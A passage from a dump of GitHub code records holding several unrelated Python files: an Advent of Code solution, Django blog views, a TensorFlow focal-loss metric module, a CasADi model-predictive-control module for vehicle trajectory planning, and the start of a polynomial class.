[]\n\tsumValue = 0;\n\tfor firstValue in values :\n\t\tsumValue = sumValue + firstValue\n\t\tsetNumbers.append(firstValue)\n\t\tif sumValue == valueToCompare :\n\t\t\t\treturn (True,setNumbers)\n\t\n\treturn (False, []);\n\t\t\t\t\n\nf = open(\"advento2020/day9/input.txt\", \"r\")\nlines = f.readlines()\n\nxmasNumbers = []\nnotValidNumbers = []\npreamble = 25\nfor current in lines:\n\tparsedValue = int(current.strip())\n\tif len(xmasNumbers) >= (preamble + 1) and not existsSumInArray(parsedValue,xmasNumbers[len(xmasNumbers)-(preamble + 1):len(xmasNumbers)]):\n\t\tnotValidNumbers.append(parsedValue)\n\t\n\txmasNumbers.append(parsedValue)\t\n\t\t\nprint(notValidNumbers)\n\nvalueToCompare = notValidNumbers[0]\n\nindex = 0;\nresult = {}\nwhile index < len(xmasNumbers) :\n\tresult = sumContiguous(valueToCompare,xmasNumbers[index:len(xmasNumbers)])\n\tindex = index +1\n\n\tif result[0] :\n\t\tprint(sorted(result[1]))\n\t\tbreak;\n\nsortedList = sorted(result[1])\nprint (f\"{sortedList[0]} + {sortedList[len(sortedList)-1]} = {sortedList[0] + sortedList[len(sortedList)-1]}\" )","repo_name":"bmvmachado/advento2020","sub_path":"day9/exercise2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3559918495","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import\n\nfrom datetime import datetime\n#from django.http import Http404, HttpResponse\n#from django.shortcuts import render_to_response, render, redirect, \\\n# get_object_or_404, get_list_or_404\nfrom django.conf import settings\nfrom django.views import generic\nfrom django.http import Http404\nfrom django.core import validators\nfrom ..utils.pagination import get_pagination\nfrom .models import Article, ArticleTag, Category, Tag\n\nvalidator_url = validators.URLValidator()\n\n\nclass BlogTemlateView(generic.TemplateView):\n def _get_categories(self):\n return {'categories': Category.objects.all()}\n\n def _classify_by_date(self):\n r = {}\n articles = Article.vobjects.all()\n for obj in articles:\n year = obj.created.year\n month = obj.created.month\n r.setdefault(year, [])\n if month not in r[year]:\n r[year].append(month)\n return {'dates': r}\n\n def _get_tags(self):\n return {'tags': Tag.objects.all()}\n\n def _get_lastest_articles(self):\n return {\"lastest_articles\": Article.vobjects.order_by('-created')[:10]}\n\n def _get_click_articles(self):\n return {\"click_articles\": Article.vobjects.order_by('-clicks')[:10]}\n\n def get_paginator(self, queryset):\n return get_pagination(queryset, self.request.REQUEST.get(\"page\"))\n\n def get_context_data(self, *args, **kwargs):\n kwargs.update(self._get_categories())\n kwargs.update(self._get_tags())\n kwargs.update(self._classify_by_date())\n kwargs.update(self._get_lastest_articles())\n kwargs.update(self._get_click_articles())\n return super(BlogTemlateView, self).get_context_data(**kwargs)\n\n\nclass IndexView(BlogTemlateView):\n template_name = 'blog/index.html'\n\n def get_context_data(self, **kwargs):\n queryset = Article.vobjects.all()\n kwargs.update(self.get_paginator(queryset))\n return super(IndexView, self).get_context_data(**kwargs)\n\n\nclass CategoryView(BlogTemlateView):\n template_name = \"blog/category.html\"\n\n def get_context_data(self, **kwargs):\n queryset = Article.vobjects.filter(category_id=self.kwargs['pk'])\n kwargs.update(self.get_paginator(queryset))\n return super(CategoryView, self).get_context_data(**kwargs)\n\n\nclass YearView(BlogTemlateView):\n template_name = 'blog/year.html'\n\n def get_context_data(self, **kwargs):\n year = int(self.kwargs['year'].strip())\n start = datetime(year, 1, 1)\n end = datetime(year + 1, 1, 1)\n queryset = Article.vobjects.filter(created__gte=start).filter(created__lt=end)\n kwargs.update(self.get_paginator(queryset))\n return super(YearView, self).get_context_data(**kwargs)\n\n\nclass MonthView(BlogTemlateView):\n template_name = 'blog/month.html'\n\n def get_context_data(self, **kwargs):\n year = int(self.kwargs['year'].strip())\n month = int(self.kwargs['month'].strip())\n start = datetime(year, month, 1)\n if month < 1 or month > 12:\n raise Http404()\n elif month == 12:\n end = datetime(year + 1, 1, 1)\n else:\n end = datetime(year, month + 1, 1)\n queryset = Article.vobjects.filter(created__gte=start).filter(created__lt=end)\n kwargs.update(self.get_paginator(queryset))\n return super(YearView, self).get_context_data(**kwargs)\n\n\nclass TagView(BlogTemlateView):\n template_name = 'blog/tag.html'\n\n def get_context_data(self, **kwargs):\n article_tag_list = ArticleTag.objects.filter(tag_id=self.kwargs['tag_id'])\n queryset = []\n for i in article_tag_list:\n queryset.append(i.article_id)\n kwargs.update(self.get_paginator(queryset))\n return super(TagView, self).get_context_data(**kwargs)\n\n\nclass ArticleView(BlogTemlateView):\n template_name = 'blog/article.html'\n\n def get_context_data(self, **kwargs):\n try:\n article = Article.vobjects.filter(id=self.kwargs['id'])[0]\n except:\n raise Http404()\n article.click_once()\n kwargs['object'] = article\n kwargs['duoshuo'] = settings.DUOSHUO_SHORT_NAME\n return super(ArticleView, self).get_context_data(**kwargs)\n","repo_name":"snowflying/homepage","sub_path":"homepage/homepage/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8565287527","text":"import logging\n\nimport tensorflow as tf\n\nimport anchors\n\nlogger = logging.getLogger('detection')\n\ndef focal_loss(y_true: tf.Tensor,\n y_pred: tf.Tensor,\n gamma: float = 1.5,\n alpha: float = 0.25,\n from_logits: bool = False,\n reduction: str = 'sum'):\n\n y_true = tf.cast(y_true, tf.float32)\n y_pred = tf.cast(y_pred, tf.float32)\n\n if from_logits:\n y_pred = tf.nn.softmax(y_pred)\n\n epsilon = 1e-6\n y_pred = tf.clip_by_value(y_pred, epsilon, 1. - epsilon)\n\n alpha = tf.ones_like(y_true) * alpha\n alpha = tf.where(tf.equal(y_true, 1.), alpha, 1 - alpha)\n\n pt = tf.where(tf.equal(y_true, 1.), y_pred, 1 - y_pred)\n\n loss = -alpha * tf.pow(1. - pt, gamma) * tf.math.log(pt)\n loss = tf.reduce_sum(loss, axis=-1)\n\n if reduction == 'mean':\n return tf.reduce_mean(loss)\n elif reduction == 'sum':\n return tf.reduce_sum(loss)\n\n return loss\n\nclass Metric:\n def __init__(self, training=True, **kwargs):\n self.training = training\n\n self.total_loss = tf.keras.metrics.Mean()\n self.reg_loss = tf.keras.metrics.Mean()\n self.dist_loss = tf.keras.metrics.Mean()\n self.ce_loss = tf.keras.metrics.Mean()\n self.ce_image_loss = tf.keras.metrics.Mean()\n\n self.ce_acc = tf.keras.metrics.CategoricalAccuracy()\n self.ce_image_acc = tf.keras.metrics.CategoricalAccuracy()\n\n def reset_states(self):\n self.total_loss.reset_states()\n self.reg_loss.reset_states()\n self.dist_loss.reset_states()\n self.ce_loss.reset_states()\n self.ce_image_loss.reset_states()\n\n self.ce_acc.reset_states()\n self.ce_image_acc.reset_states()\n\n def str_result(self):\n return 'total_loss: {:.4f}, reg_loss: {:.3f}, dist: {:.3f}, ce: {:.3f}, image_ce: {:.3f}, acc: {:.3f}, image_acc: {:.3f}'.format(\n self.total_loss.result(),\n self.reg_loss.result(),\n self.dist_loss.result(),\n self.ce_loss.result(),\n self.ce_image_loss.result(),\n\n self.ce_acc.result(),\n self.ce_image_acc.result(),\n )\n\n\nclass ModelMetric:\n def __init__(self,\n all_anchors: tf.Tensor,\n num_classes: int,\n dtype: tf.dtypes.DType = tf.float32,\n **kwargs):\n\n self.all_anchors = all_anchors\n self.num_classes = num_classes\n self.dtype = dtype\n\n self.train_metric = Metric(training=True, name='train_metric')\n\n self.dist_loss = tf.keras.losses.Huber(reduction=tf.keras.losses.Reduction.SUM)\n\n def str_result(self, training):\n return self.train_metric.str_result()\n\n def reset_states(self):\n self.train_metric.reset_states()\n\n def __call__(self, images, true_bboxes, true_labels, true_image_labels, pred_bboxes, pred_scores, pred_image_scores, training):\n true_bboxes, true_labels = anchors.anchor_targets_bbox(self.all_anchors, images, true_bboxes, true_labels, self.num_classes, dtype=self.dtype)\n\n y_shape = tf.shape(true_labels)\n batch = y_shape[0]\n n_anchors = y_shape[1]\n\n anchors_states = true_labels[:, :, -1]\n not_ignore_idx = tf.where(tf.not_equal(anchors_states, -1.))\n true_idx = tf.where(tf.equal(anchors_states, 1.))\n\n normalizer = tf.shape(true_idx)[0]\n normalizer = tf.cast(normalizer, tf.float32)\n\n true_not_ignore_labels = tf.gather_nd(true_labels[:, :, :-1], not_ignore_idx)\n pred_not_ignore_scores = tf.gather_nd(pred_scores, not_ignore_idx)\n\n true_bboxes = tf.gather_nd(true_bboxes[:, :, :-1], true_idx)\n pred_bboxes = tf.gather_nd(pred_bboxes, true_idx)\n\n dist_loss = self.dist_loss(true_bboxes, pred_bboxes)\n class_loss = focal_loss(true_not_ignore_labels, pred_not_ignore_scores, reduction='sum')\n\n # normalizer equals zero when there are no bboxes and there are only image classes\n if normalizer != 0:\n dist_loss = tf.divide(dist_loss, normalizer)\n class_loss = tf.divide(class_loss, normalizer)\n\n self.train_metric.dist_loss.update_state(dist_loss)\n self.train_metric.ce_loss.update_state(class_loss)\n\n true_fg_labels = tf.gather_nd(true_labels[:, :, :-1], true_idx)\n pred_fg_scores = tf.gather_nd(pred_scores, true_idx)\n self.train_metric.ce_acc.update_state(true_fg_labels, pred_fg_scores)\n\n image_class_loss = 0.\n if pred_image_scores is not None:\n image_class_loss = focal_loss(true_image_labels, pred_image_scores, reduction='sum')\n self.train_metric.ce_image_loss.update_state(image_class_loss)\n self.train_metric.ce_image_acc.update_state(true_image_labels, pred_image_scores)\n\n return dist_loss, class_loss, image_class_loss\n","repo_name":"bioothod/object_detection","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":4889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34034678282","text":"import numpy as np\nfrom casadi import *\nimport math\nimport time\n# from data_module import data\nimport matplotlib.pyplot as plt\n\n# 车的长与宽\nL, W = 4.8, 2.0\n\n\n# 决策模块:\nclass Decision(object):\n def __init__(self):\n # 调用 Processor()类\n self.Processor = Processor()\n # 调用 ModelPredictiveControl()类\n self.MPC = ModelPredictiveControl()\n\n # 输入初始状态以及参考路径,输出MPC解\n def update(self, init_states, ref_path):\n\n # self.Processor.nav_data = self.data.get_navigation(id=0)\n # self.Processor.sensor_data = dict(ego_data=self.data.get_navigation(id=0),\n # sur_data=self.data.get_traffic(id=0))\n # self.Processor.nav_data = nav_data\n # self.Processor.sensor_data = sensor_data\n # trajs = self.Processor.get_trajs()\n # init_states = self.Processor.get_nearest_vehs()\n\n # 生成大小为(1,86)的列表,元素都是0 :[0 , 0, ...,0]\n X0 = np.zeros(86).tolist()\n # 调用类中的求解函数得到结果\n return self.MPC.mpc_solver(init_states, X0, ref_path)\n\n # info = {'index': {'action': action, 'cost': cost, 'dd': deaddistance}}\n\n\n# 车辆模型类:存储车辆参数 + 离散系统下的车辆状态转移方程\nclass VehicleDynamics(object):\n def __init__(self, ):\n\n # 生成一个字典:用于调用车辆参数\n self.vehicle_params = dict(C_f=-128915.5, # front wheel cornering stiffness [N/rad]\n C_r=-85943.6, # rear wheel cornering stiffness [N/rad]\n a=1.06, # distance from CG to front axle [m]\n b=1.85, # distance from CG to rear axle [m]\n mass=1412., # mass [kg]\n I_z=1536.7, # Polar moment of inertia at CG [kg*m^2]\n miu=1.0, # tire-road friction coefficient\n g=9.81, # acceleration of gravity [m/s^2]\n )\n\n # 在vehicle_params字典中,按照 key 获取 value,物理意义依次是: 质心到前轴距离、质心到后轴距离、整车质量、重力加速度\n a, b, mass, g = self.vehicle_params['a'], self.vehicle_params['b'], \\\n self.vehicle_params['mass'], self.vehicle_params['g']\n\n # 分别计算前后轴的垂向载荷\n F_zf, F_zr = b * mass * g / (a + b), a * mass * g / (a + b)\n\n # 将前后轴载荷计算结果添加到vehicle_params字典中\n self.vehicle_params.update(dict(F_zf=F_zf,\n F_zr=F_zr))\n\n # 离散系统下,车辆的状态转移方程,简而言之:x(t+1) = f(x_t,u_t,dt)\n def f_xu(self, x, u, tau):\n\n # 车辆状态,依次是:[纵向速度、横向速度、横摆角速度、 纵向坐标、横向坐标、航向角]\n v_x, v_y, r, x, y, phi = x[0], x[1], x[2], x[3], x[4], x[5]\n # 角度转弧度: °--->rad\n phi = phi * np.pi / 180.\n # 控制量依次是:[车轮转角,纵向加速度]\n steer, a_x = u[0], u[1]\n # 从vehicle_params字典中提取参数,依次是:[前轮侧偏刚度、后轮侧偏刚度、质心到前轴距离、质心到后轴距离、整车质量、绕z轴的转动惯量、胎-陆摩擦系数、重力加速度]\n C_f = self.vehicle_params['C_f']\n C_r = self.vehicle_params['C_r']\n a = self.vehicle_params['a']\n b = self.vehicle_params['b']\n mass = self.vehicle_params['mass']\n I_z = self.vehicle_params['I_z']\n miu = self.vehicle_params['miu']\n g = self.vehicle_params['g']\n # 利用模型计算下一时刻车辆状态:x(t+1) = f(x_t,u_t,dt)\n next_state = [v_x + tau * (a_x + v_y * r),\n (mass * v_y * v_x + tau * (\n a * C_f - b * C_r) * r - tau * C_f * steer * v_x - tau * mass * power(\n v_x, 2) * r) / (mass * v_x - tau * (C_f + C_r)),\n (-I_z * r * v_x - tau * (a * C_f - b * C_r) * v_y + tau * a * C_f * steer * v_x) / (\n tau * (power(a, 2) * C_f + power(b, 2) * C_r) - I_z * v_x),\n x + tau * (v_x * cos(phi) - v_y * sin(phi)),\n y + tau * (v_x * sin(phi) + v_y * cos(phi)),\n (phi + tau * r) * 180 / np.pi]\n # 返回下一时刻车辆状态\n return next_state\n\n\n\n# 该类功能:周车状态预测 + 构造自车与周车约束\nclass Dynamics(object):\n\n # 输入初始状态、离散时间间隔、单车的状态维数\n def __init__(self, x_init, tau, per_veh_info_dim=4):\n\n # 初始化:将输入依次存储\n self.x_init = x_init\n self.tau = tau\n self.per_veh_info_dim = per_veh_info_dim\n # 调用车辆模型类:VehicleDynamics()\n self.vd = VehicleDynamics()\n # 存储x_init[6:] todo: 需要明确 x_init[6:]是什么,猜测是四辆周车的信息,每辆车状态是四维\n self.vehs = x_init[6:]\n\n # 递推四辆周车状态并更新self.vehs\n def vehs_pred(self):\n vehs_pred = []\n # 遍历,调用sur_veh_predict 函数递推四辆周车状态并更新\n for vehs_index in range(4):\n vehs_pred += \\\n self.sur_veh_predict(\n self.vehs[vehs_index * self.per_veh_info_dim : (vehs_index + 1) * self.per_veh_info_dim])\n\n # 递推四辆周车状态并更新self.vehs\n self.vehs = vehs_pred\n\n # 周车的状态预测\n def sur_veh_predict(self, vehs):\n # 大地坐标系下,周车 横向位置、纵向位置、速度、航向角\n veh_x, veh_y, veh_v, veh_phi = vehs[0], vehs[1], vehs[2], vehs[3]\n # ° ---> rad\n veh_phis_rad = veh_phi * np.pi / 180.\n # 离散时间内,大地坐标系下周车横纵向位移\n veh_x_delta = veh_v * self.tau * math.cos(veh_phis_rad)\n veh_y_delta = veh_v * self.tau * math.sin(veh_phis_rad)\n # 默认预测期间,周车航向角不变\n veh_phi_rad_delta = 0\n # veh_phi_rad_delta = veh_r * self.tau # TODO: 确认是否可以获得角速度来进行估计\n # 计算周车下一时刻状态\n next_veh_x, next_veh_y, next_veh_v, next_veh_phi_rad = \\\n veh_x + veh_x_delta, veh_y + veh_y_delta, veh_v, veh_phis_rad + veh_phi_rad_delta\n # rad ---> °\n next_veh_phi = next_veh_phi_rad * 180 / np.pi\n # 航向角约束在[-180°,+180°]\n next_veh_phi = deal_with_phi(next_veh_phi)\n # 返回周车一步预测状态 [横向位置、纵向位置、速度、航向角]\n return [next_veh_x, next_veh_y, next_veh_v, next_veh_phi]\n\n # 调用车辆模型类 VehicleDynamics:完成一步自车状态预测\n def ego_veh_predict(self, x, u):\n next_ego = self.vd.f_xu(x, u, self.tau) # Unit of heading angle is degree\n return next_ego\n\n # 构造自车与周车约束\n def construct_sur_constraints(self, x):\n # 自车 横向坐标、纵向坐标、航向角\n ego_x, ego_y, ego_phi = x[3], x[4], x[5]\n # 约束集合\n g_list = []\n # 自车 (长-宽)/2\n ego_lws = (L - W) / 2. # TODO:自车长宽的设定由自车信息引入,考虑在x_init引入\n # 自车前轴的横纵坐标\n ego_front_points = ego_x + ego_lws * cos(ego_phi * np.pi / 180.), \\\n ego_y + ego_lws * sin(ego_phi * np.pi / 180.)\n # 自车后轴的横纵坐标\n ego_rear_points = ego_x - ego_lws * cos(ego_phi * np.pi / 180.), \\\n ego_y - ego_lws * sin(ego_phi * np.pi / 180.)\n\n # 实质是添加约束:遍历周车,使之不与自车碰撞\n for vehs_index in range(4):\n # 遍历周车\n veh = self.vehs[vehs_index * self.per_veh_info_dim:(vehs_index + 1) * self.per_veh_info_dim]\n # 获取周车横纵向位置与航向角\n veh_x, veh_y, veh_phi = veh[0], veh[1], veh[3]\n # 本意应该是周车的 (长-宽)/2\n veh_lws = (L - W) / 2. # TODO:周车的长宽引入变量,L = veh[4], W = veh[5], 同时在x_init引入\n # 周车前轴的横纵坐标\n veh_front_points = veh_x + veh_lws * math.cos(veh_phi * np.pi / 180.), \\\n veh_y + veh_lws * math.sin(veh_phi * np.pi / 180.)\n # 周车后轴的横纵坐标\n veh_rear_points = veh_x - veh_lws * math.cos(veh_phi * np.pi / 180.), \\\n veh_y - veh_lws * math.sin(veh_phi * np.pi / 180.)\n # 计算自车前轴坐标点与每辆周车前后轴坐标点的距离,自车后轴坐标点与每辆周车前后轴坐标点的距离:共 2*2*4 =16 个约束,注意约束的添加顺序是一辆一辆算周车的\n # 遍历自车前后轴坐标点\n for ego_point in [ego_front_points, ego_rear_points]:\n # 遍历周车前后轴坐标点\n for veh_point in [veh_front_points, veh_rear_points]:\n # 绝对距离计算 - 3.5 : 猜测3.5是安全距离,单位m\n veh2veh_dist = sqrt(power(ego_point[0] - veh_point[0], 2) + power(ego_point[1] - veh_point[1], 2)) - 3.5\n # 添加约束\n g_list.append(veh2veh_dist)\n # 返回自车与周车约束\n return g_list\n\n\n\n# 模型预测控制,需要调用casadi实现\nclass ModelPredictiveControl(object):\n # 初始化:预测时域、频率(倒数为离散时间)、期望速度、自车状态维数、动作维数、None、求解器字典\n def __init__(self, horizon=10):\n self.horizon = horizon\n self.base_frequency = 10.\n self.exp_v = 10.\n self.STATE_DIM = 6 # ego_info\n self.ACTION_DIM = 2\n self.dynamics = None\n self._sol_dic = {'ipopt.print_level': 0,\n 'ipopt.sb': 'yes',\n 'print_time': 0}\n\n # mpc求解器:输出初始状态、XO、参考路径\n def mpc_solver(self, x_init, XO, ref_path):\n # 调用 Dynamics 类\n self.dynamics = Dynamics(x_init, 1 / self.base_frequency)\n # casadi框架下: 声明变量x,u\n x = SX.sym('x', self.STATE_DIM)\n u = SX.sym('u', self.ACTION_DIM)\n # casadi框架下声明向量f: 将\"x\" \"u\"作为输入,调用ego_veh_predict函数,得到输出, 将输出用casadi框架下的vertcat表示\n f = vertcat(*self.dynamics.ego_veh_predict(x, u))\n # casadi框架下创建一个函数,命名为F : 描述casadi框架下变量 “x” “u” 与 “f” 的关系(通过x,u构造f)\n F = Function(\"F\", [x, u], [f]) # ego predict model\n\n # 创建用于优化非线性问题的空列表\n # Create empty NLP\n # 优化目标/对象\n w = [] # variables to optimize\n # 状态与动作约束条件的下界\n lbw = [] # lower bound for state and action constraints\n # 状态与动作约束条件的上界\n ubw = [] # upper bound for state and action constraints\n # 距离约束条件的下界\n lbg = [] # lower bound for distance constraint\n # 距离约束条件的上界\n ubg = [] # upper bound for distance constraint\n # 动力学约束条件\n G = [] # dynamic constraints ( reduce the nonlinear of the original NLP)\n # 目标函数/代价函数\n J = 0 # accumulated cost\n\n # Initial conditions\n # casadi框架下初始化状态,取名X0\n Xk = MX.sym('X0', self.STATE_DIM)\n # 添加优化目标:车辆初始状态\n w += [Xk]\n # 添加初始状态的约束条件(初始状态是自约束,上下界都是本身)\n lbw += x_init[:6]\n ubw += x_init[:6] # force the X0 = x_init\n\n # 得到casadi框架下的变量g\n g = vertcat(*self.dynamics.construct_sur_constraints(x))\n # casadi框架下创建一个函数G_f,命名为\"Gf\" :描述casadi框架下变量 “x” 与 “g” 的关系(通过x构造g)\n G_f = Function('Gf', [x], [g])\n\n # 遍历预测步长,添加优化目标和约束条件:\n for k in range(1, self.horizon + 1):\n # Local control\n # casadi框架下: 声明控制变量U0~Un\n Uname = 'U' + str(k - 1)\n Uk = MX.sym(Uname, self.ACTION_DIM)\n # 添加优化目标/对象(自车动作)\n w += [Uk]\n # 添加动作约束的上下界\n lbw += [-0.4, -4.] # todo: action constraints\n ubw += [0.4, 2.]\n\n # 调用casadi框架下声明的函数F,实质是实现自车状态的一步预测\n Fk = F(Xk, Uk)\n # 调用casadi框架下声明的函数G_f,实质是实现周车状态的一步预测\n Gk = G_f(Xk)\n # 周车递推一步,改变周车状态\n self.dynamics.vehs_pred()\n # casadi框架下: 声明自车状态变量X0~Xn\n Xname = 'X' + str(k)\n Xk = MX.sym(Xname, self.STATE_DIM)\n\n # Dynamic Constraints\n # 自车状态递推一步后的自约束:上下界都是0 (通过规定上下界都是0,使状态最优解唯一:解为模型递推结果本身)\n G += [Fk - Xk] # ego vehicle dynamic constraints\n lbg += [0.0] * self.STATE_DIM\n ubg += [0.0] * self.STATE_DIM\n # 自车与周车距离的上下界约束:为达到安全距离,给一个非负范围\n G += [Gk] # surrounding vehicle constraints\n lbg += [0.0] * (4 * 4)\n ubg += [inf] * (4 * 4)\n # 添加优化目标/对象(自车状态) : 这里第一维状态范围是[0~8],其他是正负无穷\n w += [Xk]\n lbw += [0.] + [-inf] * (self.STATE_DIM - 1) # speed constraints\n ubw += [8.] + [inf] * (self.STATE_DIM - 1)\n\n # casadi框架下创建一个函数F_cost,命名为\"F_cost\" :描述casadi框架下变量 “x” “u” 与 “x^TQX + u^TRu”的关系\n # todo:1. 如果x,u维数固定,最好写成 x^TQX + u^TRu; 2.\n\n # Cost function\n F_cost = Function('F_cost', [x, u], [0.05 * power(x[0]-ref_path[3][k], 2)\n + 0.8 * power(x[3] - ref_path[0][k], 2)\n + 0.8 * power(x[4] - ref_path[1][k], 2)\n + 30 * power((x[5] - ref_path[2][k]) * np.pi / 180., 2)\n + 0.02 * power(x[2], 2)\n + 5 * power(u[0], 2)\n + 0.05 * power(u[1], 2)\n ]) # TODO: cost的形式没有改正确,重点是自车状态和ref没有确定\n # 叠加每步的“代价”,组成代价函数\n J += F_cost(w[k * 2], w[k * 2 - 1])\n\n # Create NLP solver\n # 构造casadi框架下的优化问题:优化对象为f = J, 约束条件为g = G, 求解/优化结果为x = w\n nlp = dict(f=J, g=vertcat(*G), x=vertcat(*w))\n # 构造casadi框架下的求解器: 取名'S', 内置求解器‘ipopt’, 其他配置:self._sol_dic\n S = nlpsol('S', 'ipopt', nlp, self._sol_dic)\n\n # load constraints and solve NLP\n # 为casadi框架下的求解器添加约束条件,得到求解/优化结果\n r = S(lbx=vertcat(*lbw), ubx=vertcat(*ubw), x0=XO, lbg=vertcat(*lbg), ubg=vertcat(*ubg))\n\n # 提取求解结果,state_all为求解得到的自车状态和动作序列\n state_all = np.array(r['x'])\n # 提取求解结果,g_all为求解得到的周车信息序列\n g_all = np.array(r['g'])\n # 得到大小为(预测步数,状态维数)的数组\n state = np.zeros([self.horizon, self.STATE_DIM])\n # 得到大小为(预测步数,动作维数)的数组\n control = np.zeros([self.horizon, self.ACTION_DIM])\n # 得到大小为(预测步数,状态维数+动作维数)的数组\n nt = self.STATE_DIM + self.ACTION_DIM # total variable per step\n # 提取求解结果,cost为求解得到“代价”序列\n cost = np.array(r['f']).squeeze(0)\n\n # 将得到的序列信息存起来\n # save trajectories\n for i in range(self.horizon):\n state[i] = state_all[nt * i: nt * (i + 1) - self.ACTION_DIM].reshape(-1)\n control[i] = state_all[nt * (i + 1) - self.ACTION_DIM: nt * (i + 1)].reshape(-1)\n return state, control, state_all, g_all, cost\n\n\n\n# 类\nclass Processor(object):\n\n # 初始化\n def __init__(self):\n # self.ego_xy = cur_position\n # self.nav_data = nav # nav is a dict\n # self.sensor_data = sensor # ?\n # 预测 时域/步数\n self.horizon = 20\n # self.exp_v = 10 # m/s\n # s 离散时间间隔\n self.tau = 0.1\n self.out_20_point = None\n\n # 获取参考路径轨迹\n def get_trajs(self):\n trajs = [{},{},{}]\n ref_points = []\n self.nav_data['ref_points'] = ref_points\n for i in ref_points:\n for j in ref_points[i]:\n trajs[i]['path'] = ref_points[i][j][:,0:42:2]\n trajs[i]['dead_dist'] = self.nav_data['dead_dist']\n return trajs\n\n # 找到最近的车辆\n def get_nearest_vehs(self):\n\n '''\n sensor_data is a dict\n input: sensor_data-->{'ego_data':np.array([x,y,v_x,v_y,phi,r]),'sur_data':np.array([[x,y,v_y,phi,r],[]....])}\n output:init_states-->np.array([...]) 36dim\n\n '''\n ego_data = []\n sur_data = []\n init_states = []\n tep = []\n self.sensor_data['ego_data'] = ego_data\n self.sensor_data['sur_data'] = sur_data\n if self.sensor_data['sur_data'].shape[0] > 6:\n for i in range(self.sensor_data['sur_data'].shape[0]):\n dis = np.sum(np.square(ego_data[:2]-sur_data[i][:2]))\n tep.append([dis, i])\n\n tep.sort()\n\n for i in range(6):\n init_states = ego_data\n init_states.append(sur_data[tep[i][1]])\n else:\n init_states = ego_data\n init_states.append(sur_data)\n\n return np.array(init_states)\n\n\n\n# 将航向角约束在[-180°,180°]\ndef deal_with_phi(phi):\n # casadi函数: if_else(DM cond, DM if_true, DM if_false, bool short_circuit) -> DM\n return if_else(phi > 180, phi - 360, if_else(phi < -180, phi + 360, phi))\n\n\nif __name__ == '__main__':\n Decision = Decision()\n ego_data = np.array([3, 0, 0, 0, 0, 0])\n # sur_data = np.array([[5, 0, 10, 0], [10, 5, 10, 0], [5, 0, 10, 0], [2, -4, 10, 0],\n # [0, 10, 10, 0], [0, 20, 10, 0]])\n sur_data = np.array([[10, 0, 0, 8], [10, 0, 0, 10], [10, 0, 0, 10], [10, 0, 0, 10]])#, [10, 0, 0, 10], [10, 0, 0, 10]]) # x,y,v,phi\n init_state = np.concatenate((ego_data, sur_data.flatten()), axis=0).tolist()\n ref_path = np.array([[0.3*i, 0, 0, 3] for i in range(21)]).T # x, y, phi, v\n ref_path = ref_path.tolist()\n # state, control, state_all, g_all, cost = Decision.update(init_state, ref_path)\n t1 = time.time()\n state, control, state_all, g_all, cost = Decision.update(init_state, ref_path)\n t2 = time.time()\n print(t2-t1)\n\n\n","repo_name":"SuirongYi/test1","sub_path":"decision_module1.py","file_name":"decision_module1.py","file_ext":"py","file_size_in_byte":20037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4975434113","text":"from __future__ import annotations\n\nimport itertools\nimport math\nimport re\nfrom fractions import Fraction\n\nfrom iter_helpers import iter_2partitions\nfrom number import stirlingI\n\nNumber = int | Fraction\n\n\nclass Polynomial:\n \"\"\"Class for a polynomial with rational coefficients.\"\"\"\n\n def __init__(self, *coefficients: Number) -> None:\n self.coefficients: list[Number] = [\n coefficient if isinstance(coefficient, int) else Fraction(coefficient)\n for coefficient in coefficients\n ]\n if not self.coefficients:\n self.coefficients.append(0)\n\n def __repr__(self) -> str:\n return \"Polynomial(\" + \",\".join(str(coeff) for coeff in self.coefficients) + \")\"\n\n def __str__(self) -> str:\n s = \"\".join(\n f\"{'+' if coeff > 0 else '-'}{abs(coeff)}x^{power}\"\n for power, coeff in enumerate(self.coefficients)\n if coeff != 0\n )\n s = re.sub(r\"\\^1(?!\\d)\", \"\", s, 1) # Fix x^1\n s = re.sub(r\"x\\^0\", \"\", s, 1) # Fix x^0\n s = re.sub(r\"(? \", s) # Put spaces between signs\n s = re.sub(r\"^\\+\", \"\", s, 1) # Remove leading +\n if not s:\n return \"0\"\n return s\n\n def __getitem__(self, key: int) -> Number:\n return self.coefficients[key]\n\n def __iter__(self):\n return iter(self.coefficients)\n\n @property\n def degree(self) -> int:\n return len(self.coefficients) - 1\n\n def _truncate(self) -> Polynomial:\n \"\"\"Remove leading zeros\"\"\"\n\n while len(self.coefficients) > 1 and self.coefficients[-1] == 0:\n self.coefficients.pop()\n\n return self\n\n def __call__(self, x: Number) -> Number:\n \"\"\"Evaluate polynomial at a given point\"\"\"\n\n res = 0\n for coefficient in reversed(self.coefficients):\n res = coefficient + x * res\n return res\n\n def __add__(self, other: Polynomial | Number) -> Polynomial:\n if isinstance(other, Number):\n other = Polynomial(other)\n if isinstance(other, Polynomial):\n res = Polynomial(\n *[\n coef1 + coef2\n for coef1, coef2 in itertools.zip_longest(\n self.coefficients, other.coefficients, fillvalue=0\n )\n ]\n )\n res._truncate()\n return res\n return NotImplemented\n\n __radd__ = __add__\n\n def __neg__(self) -> Polynomial:\n return Polynomial(*[-coeff for coeff in self.coefficients])\n\n def __sub__(self, other: Polynomial | Number) -> Polynomial:\n if isinstance(other, Number):\n other = Polynomial(other)\n if isinstance(other, Polynomial):\n res = Polynomial(\n *[\n coef1 - coef2\n for coef1, coef2 in itertools.zip_longest(\n self.coefficients, other.coefficients, fillvalue=0\n )\n ]\n )\n res._truncate()\n return res\n return NotImplemented\n\n def __rsub__(self, other: Polynomial | Number) -> Polynomial:\n return (-1) * self + other\n\n def __mul__(self, other: Polynomial | Number) -> Polynomial:\n if other == 0:\n return Polynomial()\n if isinstance(other, Number):\n return Polynomial(*[other * coeff for coeff in self.coefficients])\n if isinstance(other, Polynomial):\n bounds = (self.degree, other.degree)\n return Polynomial(\n *[\n sum(\n self[i] * other[j]\n for i, j in iter_2partitions(n, bounds=bounds)\n )\n for n in range(self.degree + other.degree + 1)\n ]\n )\n return NotImplemented\n\n __rmul__ = __mul__\n\n def __pow__(self, power: int) -> Polynomial:\n n = 